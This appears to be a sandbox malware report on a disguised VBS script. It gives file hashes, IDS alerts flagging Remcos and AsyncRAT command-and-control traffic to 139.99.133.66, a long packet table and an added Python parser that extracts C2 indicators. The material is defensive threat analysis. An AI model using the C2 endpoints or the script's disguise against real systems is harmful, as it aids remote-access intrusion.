                                  Preview:'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_ParamsActIDOptional = "[Activation ID | All]"'' SIG '' Begin signature block..' L_optListTkaCerts = "ltc"..' L_optListTkaCertsUsage = "List Token-based Activation Certificates"....' L_optForceTkaActivation = "fta"..' L_optForceTkaActivationUsage = "Force Token-based 444Activatio44n"......' L_optADActivate = "ad-activation-o33nline"..' L_optADActivateUsage = "Activate AD (Active Directory) forest with user-provided product key"....' L_optADGetIID = "ad-activatio444n-get-iid"..' L_optADGetIIDUsage = "Display Installation ID for AD (Active Directory) forest"....' L_optADApplyCID = "ad-activation-apply-cid"..' L_optADApplyCIDUsage = "Acti44444444444444444vate AD (Active Directory) forest wi
                                  File type:Unicode text, UTF-8 text, with very long lines (59814), with CRLF line terminators
                                  Entropy (8bit):4.899906192188333
                                  TrID:
                                  • Visual Basic Script (13500/0) 100.00%
                                  File name:lmg1_Mlakaifa443456.vbs
                                  File size:233'061 bytes
                                  MD5:ade48125e600ea0434a894e7c5131462
                                  SHA1:8b5e29fc3d490ebcba5295332c601d8165a67ec5
                                  SHA256:2f7971748b7db79bdd724861d1b463b0489b790b9e60e733dea409f73abf9539
                                  SHA512:f0fd0cb6486a79fd11a245900df0cbae4166895fd057847c3e0fa6feacc21fdfc3bbb334e7241e5d0f9474b83e93866cf6207e002301a7546e04cef7b2d04fd6
                                  SSDEEP:3072:W0k79DqcN+xqgRPB5jzeTMJNHEPenFkCum03pvfpp03pp03pp03pA:jk79DqcgxqgRPBJeQJhEPeQr5
                                  TLSH:DC348371A247553943D203AF9E0E482E93363512FFA79728378CA1C45F62799E1B2E4F
                                  File Content Preview:........'..'..'....const kActionUnknown = 0..const kActionPause = 1..const kActionResume = 2..const kActionCancel = 3..const kActionList = 4....const kErrorSuccess = 0..const KErrorFailure = 1....const kNameSpace = "ro
                                  Icon Hash:68d69b8f86ab9a86
                                   Timestamp                 Protocol  SID      Message                                                        Source Port  Dest Port  Source IP      Dest IP
                                   04/24/24-17:04:24.767265  TCP       2032777  ET TROJAN Remcos 3.x Unencrypted Server Response               4444         49715      139.99.133.66  192.168.2.5
                                   04/24/24-17:04:24.390969  TCP       2032776  ET TROJAN Remcos 3.x Unencrypted Checkin                       49715        4444       192.168.2.5    139.99.133.66
                                   04/24/24-17:04:03.847489  TCP       2848152  ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)    6666         49704      139.99.133.66  192.168.2.5
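The IDS alerts above and the packet list that follows are the report's evidence for the two C2 channels: AsyncRAT behind a flagged TLS certificate on 139.99.133.66:6666 and Remcos 3.x in cleartext on 139.99.133.66:4444, both reached from the analysis host 192.168.2.5. When these tables are copied or scraped as text, the port and address columns run together into one digit string, and splitting that string is ambiguous in general (49704/6666 versus 4970/46666; 192.168.2.5 + 139.99.133.66 versus 192.168.2.51 + 39.99.133.66). The Python below is an added example, not Joe Sandbox code and not part of the report: it enumerates every valid reading of a fused row, uses the rows that admit only one reading plus the fact that every flow appears in both directions to pin down the rest, and aggregates the result into remote endpoints with per-direction packet counts and the IDS messages that fired on them. The input rows are copied from this page; the function names and the scoring heuristic are my own.

```python
"""Recover flows and C2 indicators from sandbox network rows whose table columns
were fused into one string on export. Added example; not part of the report."""
import ipaddress
import re
from collections import defaultdict

# Rows copied from this report's IDS and network tables. Each fused tail reads
# <src port><dst port><src ip><dst ip> with no separators between the fields.
SNORT_ROWS = [
    "04/24/24-17:04:24.767265TCP2032777ET TROJAN Remcos 3.x Unencrypted Server Response444449715139.99.133.66192.168.2.5",
    "04/24/24-17:04:24.390969TCP2032776ET TROJAN Remcos 3.x Unencrypted Checkin497154444192.168.2.5139.99.133.66",
    "04/24/24-17:04:03.847489TCP2848152ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT Variant)666649704139.99.133.66192.168.2.5",
]
PACKET_ROWS = [
    "Apr 24, 2024 17:04:03.111262083 CEST497046666192.168.2.5139.99.133.66",
    "Apr 24, 2024 17:04:03.472683907 CEST666649704139.99.133.66192.168.2.5",
    "Apr 24, 2024 17:04:03.472836971 CEST497046666192.168.2.5139.99.133.66",
    "Apr 24, 2024 17:04:03.847489119 CEST666649704139.99.133.66192.168.2.5",
]
# The IDS message may contain digits ("3.x"), so the tail is the maximal trailing
# run of digits and dots; a message ending in a digit would be unrecoverable.
SNORT_RE = re.compile(r"^(?P<ts>\d\d/\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)(?P<proto>TCP|UDP)"
                      r"(?P<sid>\d+)(?P<msg>.*?)(?P<tail>[\d.]+)$")
PACKET_RE = re.compile(r"^(?P<ts>.+? CEST)(?P<tail>[\d.]+)$")


def _octet_ok(s):
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 255


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def split_tail(tail):
    """Enumerate every (sport, dport, src_ip, dst_ip) reading of a fused tail.
    Two IPv4 addresses contribute six dots, so the only freedom is where the digit
    run before the first dot and the run around the fourth dot are cut."""
    p = tail.split(".")
    if len(p) != 7 or not all(_octet_ok(x) for x in (p[1], p[2], p[4], p[5], p[6])):
        return []
    readings = []
    for i in range(1, len(p[0])):              # ports | first octet of src ip
        ports, a0 = p[0][:i], p[0][i:]
        for j in range(1, len(ports)):         # src port | dst port
            sp, dp = ports[:j], ports[j:]
            for k in range(1, len(p[3])):      # last octet of src ip | first octet of dst ip
                a3, b0 = p[3][:k], p[3][k:]
                if _port_ok(sp) and _port_ok(dp) and all(map(_octet_ok, (a0, a3, b0))):
                    readings.append((int(sp), int(dp), f"{a0}.{p[1]}.{p[2]}.{a3}",
                                     f"{b0}.{p[4]}.{p[5]}.{p[6]}"))
    return readings


def parse_rows(rows, regex):
    records = []
    for row in rows:
        m = regex.match(row)
        if not m:
            raise ValueError(f"unrecognised row: {row!r}")
        records.append({**m.groupdict(), "cands": split_tail(m.group("tail"))})
    return records


def resolve(records):
    """Fix one reading per row. Rows with a single reading (here every server->client
    packet) seed the known endpoints; a reading then wins if it is the unique best by
    (endpoints already known, reverse direction seen in another row, hosts known)."""
    every = {c for r in records for c in r["cands"]}
    for r in records:
        r["tuple"] = r["cands"][0] if len(r["cands"]) == 1 else None
    changed = True
    while changed:
        changed = False
        fixed = [r["tuple"] for r in records if r["tuple"]]
        endpoints = {(c[2], c[0]) for c in fixed} | {(c[3], c[1]) for c in fixed}
        hosts = {ip for ip, _ in endpoints}

        def score(c):
            return (((c[2], c[0]) in endpoints) + ((c[3], c[1]) in endpoints),
                    (c[1], c[0], c[3], c[2]) in every,
                    (c[2] in hosts) + (c[3] in hosts))

        for r in records:
            if r["tuple"] or len(r["cands"]) < 2:
                continue
            best = sorted(r["cands"], key=score, reverse=True)
            if score(best[0]) > score(best[1]):   # leave ties unresolved for a human
                r["tuple"], changed = best[0], True
    return records


def c2_indicators(records):
    """Aggregate resolved rows by their public endpoint: packets per direction, the
    local ports that spoke to it, and any IDS messages attached to that traffic."""
    ioc = defaultdict(lambda: {"to_c2": 0, "from_c2": 0, "local_ports": set(), "labels": set()})
    for r in records:
        if r["tuple"] is None:
            continue
        sp, dp, sip, dip = r["tuple"]
        if ipaddress.ip_address(dip).is_global:
            entry, direction, local_port = ioc[(dip, dp)], "to_c2", sp
        elif ipaddress.ip_address(sip).is_global:
            entry, direction, local_port = ioc[(sip, sp)], "from_c2", dp
        else:
            continue                            # local-only traffic is not an indicator
        entry[direction] += 1
        entry["local_ports"].add(local_port)
        if r.get("msg"):
            entry["labels"].add(r["msg"])
    return dict(ioc)


def analyse():
    records = resolve(parse_rows(SNORT_ROWS, SNORT_RE) + parse_rows(PACKET_ROWS, PACKET_RE))
    return records, c2_indicators(records)


if __name__ == "__main__":
    for (ip, port), info in analyse()[1].items():
        print(f"{ip}:{port}  to_c2={info['to_c2']} from_c2={info['from_c2']} "
              f"local_ports={sorted(info['local_ports'])} labels={sorted(info['labels'])}")
```

Run as a script it prints one line per remote endpoint. The server-to-client rows are what make this work: a tail such as 666649704139.99.133.66192.168.2.5 has exactly one valid reading (66664 is not a port and 6192 is not an octet), and those readings anchor the ambiguous client-to-server rows. Any record still carrying `tuple == None` afterwards is one the heuristics could not settle and should be checked against the pcap by hand.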
                                   Timestamp                             Source Port  Dest Port  Source IP      Dest IP
                                   Apr 24, 2024 17:04:03.111262083 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:03.472683907 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:03.472836971 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:03.483046055 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:03.847489119 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:03.853661060 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:04.219938993 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:04.340313911 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:05.287650108 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:05.700994968 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:05.701056957 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:06.105362892 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280117035 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280622959 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280698061 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.280803919 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280822992 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280841112 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280860901 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280873060 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.280878067 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280888081 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280905008 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280920982 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280941010 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.280946970 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.280972004 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.329175949 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.643640995 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643703938 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643745899 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643785000 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643824100 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643826008 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.643861055 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643879890 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.643899918 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.643922091 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.643943071 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644009113 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.644035101 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644073009 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644135952 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644172907 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.644210100 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644268036 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.644490004 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644527912 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.644579887 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.644750118 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.645096064 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.645136118 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.645152092 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.645174980 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.645220995 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:09.690346003 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.690484047 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:09.690555096 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.006705999 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.006769896 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.006808043 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.006833076 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.006845951 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.006891012 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.006927013 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.006982088 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007019043 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007026911 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007087946 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007126093 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007136106 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007164001 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007201910 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007206917 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007303953 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007353067 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007389069 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007458925 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007497072 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007505894 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007601023 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007656097 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007658005 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007698059 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007735968 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007744074 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007774115 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007821083 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007843971 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007883072 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007936001 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.007951975 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.007987976 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008032084 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008057117 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008094072 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008136034 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008148909 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008188009 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008233070 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008265972 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008341074 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008394957 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008446932 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008516073 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008553982 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008562088 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008593082 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008629084 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008641958 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.008733988 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.008775949 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.053261995 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.053318977 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.053359985 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.053414106 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.108516932 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.367726088 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.367773056 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.367836952 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.367949963 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368036032 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368158102 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368204117 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368242979 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368282080 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368305922 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368376970 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368448973 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368469954 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368540049 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368614912 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368643999 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368684053 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368721008 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368745089 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368812084 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.368865013 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.368901014 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369007111 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369070053 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369108915 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369163990 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369219065 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369286060 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369323015 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369383097 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369510889 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369585037 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369658947 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369699955 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369739056 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369786024 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369802952 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369837999 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369894981 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.369927883 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.369963884 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370019913 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.370055914 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370130062 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370166063 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370187998 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.370254040 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370290995 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370312929 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.370352030 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370404005 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.370439053 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370539904 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.370592117 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.414484978 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.414525986 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.414596081 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.469537973 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.514782906 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729233027 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729259968 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729278088 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729298115 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729319096 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729337931 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729389906 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729485035 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729517937 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729517937 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729542017 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729562044 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729614973 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729659081 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729676008 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729763985 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729810953 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.729837894 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729918003 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.729967117 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.730144978 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730206966 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730247974 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.730282068 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730334044 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730375051 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.730407000 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730458975 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730504990 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.730792999 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730860949 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.730906963 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.730976105 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731062889 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731101036 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.731134892 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731250048 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731292009 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.731327057 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731400013 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731441021 CEST  49704        6666       192.168.2.5    139.99.133.66
                                   Apr 24, 2024 17:04:10.731473923 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731553078 CEST  6666         49704      139.99.133.66  192.168.2.5
                                   Apr 24, 2024 17:04:10.731597900 CEST  49704        6666       192.168.2.5    139.99.133.66
